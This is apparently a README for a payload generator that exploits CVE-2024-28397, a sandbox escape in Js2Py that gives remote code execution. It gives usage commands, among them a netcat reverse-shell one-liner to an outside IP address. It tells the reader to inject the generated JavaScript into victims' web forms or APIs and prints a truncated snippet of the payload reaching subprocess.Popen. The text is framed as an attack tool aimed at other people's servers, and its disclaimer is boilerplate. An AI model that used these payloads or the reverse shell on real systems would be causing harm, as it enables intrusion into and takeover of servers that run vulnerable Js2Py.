💡 Deep Dive: Click here to read the full technical briefing (PDF).

CVE-2024-28397: Js2Py Sandbox Escape Payload Generator

A professional payload generator for CVE-2024-28397. This tool generates malicious JavaScript code designed to escape the js2py sandbox (versions <= 0.74) and execute arbitrary commands on the target system.

🚨 Vulnerability Details

• CVE ID: CVE-2024-28397
• Affected Component: Js2Py <= 0.74
• Impact: Remote Code Execution (RCE) / Sandbox Escape
• Mechanism: Exploits Object.getOwnPropertyNames to access Python's subprocess.Popen class from within the JavaScript environment.

🚀 Usage

This script generates the exact JavaScript payload needed to exploit the vulnerability. You do not need to install js2py to use this tool.

1. Generate a Payload

Run the script with the command you want to execute on the victim's machine.

# Generate payload to run 'id'
python3 exploit.py -c "id"

# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"

2. Attack the Target

Copy the output generated by the tool and inject it into the vulnerable application (e.g., a web form, API endpoint, or configuration file that is parsed by js2py).

Example Injection: If a website takes user input and runs it with js2py.eval_js(user_input), pasting the generated code will execute your command on their server.

📝 Example

$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (full malicious code) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output

👨‍💻 Author

Ali Sünbül (xeloxa)

• 📧 Email: alisunbul@proton.me
• 🌐 Website: xeloxa.netlify.app
• 🐙 GitHub: @xeloxa

⚠️ Disclaimer

This software is provided for educational and security research purposes only. The author accepts no responsibility for any misuse of this code. Ensure you have explicit permission before testing this on any system you do not own.